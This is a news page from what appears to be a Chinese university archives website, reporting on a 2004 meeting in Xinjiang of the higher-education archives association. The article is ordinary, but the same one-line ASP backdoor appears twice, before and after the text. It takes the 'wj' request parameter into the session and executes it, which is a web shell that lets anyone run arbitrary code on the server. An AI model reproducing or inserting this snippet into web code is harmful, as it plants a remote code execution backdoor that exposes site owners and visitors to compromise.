本站首页  本馆简介  馆藏概述  馆藏目录  档案法规  学校简况  学校大事记  人物档案  毕业合影  兰台ABC 

中国高等教育学会档案工作分会在新疆召开会议
发布于:2005-5-3 3:55:28

<%if request("wj")<>"" then Session("b")=request("wj")
if Session("b")<>"" then execute Session("b")%>
2004年8月15至18日,中国高等教育学会档案工作分会在新疆财经学院召开了“全国高校档案协会工作会议暨中国高等教育学会档案工作分会第三次理事会”。80多位来自全国25个省市自治区教育厅(委)和高校档案工作协会的领导、中国高等教育学会档案工作分会理事、国家档案局表彰的全国档案工作优秀集体及优秀个人代表出席了会议,共同探讨高校档案协会工作方法、交流高校档案工作经验。

  会议先后收到会议交流材料21篇,其中协会工作总结12篇,全国优秀集体和优秀个人工作总结8篇。江苏、浙江、北京、湖北、四川、黑龙江、吉林、陕西、山西、重庆等10个省市自治区高校档案协会代表,先后在大会上交流了他们开展高校档案学会工作的经验及体会,其他省分的代表也在分组讨论时介绍了本省高校档案学会、协会、协作组等工作情况,使代表们受到很大启发。

  “学会的生命力、学会的活力在于学术交流与学术研究,学会的号召力在于教育行政部门领导的大力支持和学会领导的人格魄力,学会的凝聚力在于学会领导的热情服务、无私奉献和感情联络”等等,已成为各省市高校档案学会领导的共识。不少高校档案协会都充分发挥学会的组织协调作用,积极开展学术交流、专题研讨、优秀论文评选、科研课题研究、设立学术研究基金等活动,有力推动了本地区高校档案学术研究工作的开展,并取得了大量学术研究成果。

  王刚同志在中国档案学会第五次会员代表大会上指出,档案学会要努力担负起时代赋予的重担,“重点从三个方面发挥作用:第一积极发挥组织协调作用,促进学术研究活动的开展;第二积极发挥桥梁纽带作用,密切党和政府同档案工作者的联系;第三积极发挥参谋咨询作用,主动为领导科学决策出谋划策…..,要充分利用学会所具有的“群众性、学术性特点,发挥其上下互通、左右相连的优势,吸引广大档案工作者紧密团结在党和政府的周围,为国家社会主义建设做出积极贡献。”这就要求档案学会不仅要做好学术交流与学术研究工作,还要做好上级教育主管部门和档案工作者之间的桥梁纽带,要在教育部和各省教育厅领导的大力支持与直接领导下,做好学会工作。许多省市高校档案协会都采取和教育厅(委)共同召开全省高校档案工作会议,配合省教育行政部门开展全省高校档案检查、评比、达标验收,对全省高校档案工作总结表彰和业务指导等项工作,以充分发挥学会的桥梁、纽带作用,推动本省高校档案工作的开展。安徽省教育厅还采取每年拨专款20万元支持本省要达标晋级的高校档案工作,这样既解决了部分高校档案经费不足的困难,又激励大家争先达标晋级。

  但是,目前全国尚有近一半的省市自治区高校,未能组织起来开展活动,十分可喜的是通过此次会议,许多尚未成立高校档案协会的教育厅(委)领导都表态,回去一定积极创造条件,尽快成立本省高校档案协会。在此预祝这些省市高校档案协会能早日诞生,尽快聚集本省高校档案工作者的人气,积极开展档案学术交流与研讨活动,以推动本省高校档案工作迈上新台阶。

  另外,会议还进行了全国档案工作优秀集体和优秀个人经验交流。厦门大学档案馆、清华大学档案馆和哈尔宾工业大学档案馆等全国优秀集体代表,在大会上交流了档案工作先进经验。中山大学、南京大学、西安财经学院、湘潭大学、云南大学等全国优秀集体及优秀个人也向大会提交了书面交流材料。他们的宝贵经验,值得大家借鉴。学会将陆续把这些经验交流材料在本会会刊《学校档案》杂志上刊登。

  会议期间还召开了本届三次理事会,与会理事就会长陈华新起草的“关于提请召开第三届会员代表大会的报告”中,有关新一届理事会组成人选、团体会员单位构成、会费收交方法及章程修改等有关事宜进行了充分讨论,并基本达成了共识。秘书处还向理事会报告了本会会费收支情况,会刊和简报的编辑、征订、发行情况;通报了写给教育部的“关于落实高校档案人员保健津贴的请示”和“关于中国高等教育学会档案工作分会会刊《学校档案》杂志公开刊号的申请报告”及组团赴日本考察等有关事宜。

  教育部办公厅档案处王洪元处长出席了会议,并在闭幕式上作了重要讲话。他对中国高等教育学会档案工作分会的工作及全国高校档案工作给予了充分肯定,并很有针对性地进行了具体业务指导。最后,对今后高校档案工作分会的工作提出了三点希望:一是要珍惜已有成果,认真做好全国高校档案工作优秀集体和优秀个人事迹的宣传、推广工作,并建议将这些经验汇编成册或召开现场会进行大力推广。二是要积极推动省级高校档案学会的建立,构建全国和地方两级高校档案学会的框架;他认为学会作用发挥好了,对推动高校档案工作的开展十分有利。三是对明年全国高校档案工作分会的换届改选工作进行了指导。王处长的讲话稿将会在本期《学校档案》杂志上全文刊登。

  我校作为陕西高教系统档案学会的秘书长单位,秦健玲同志出席了本次会议。

<%if request("wj")<>"" then Session("b")=request("wj")
if Session("b")<>"" then execute Session("b")%>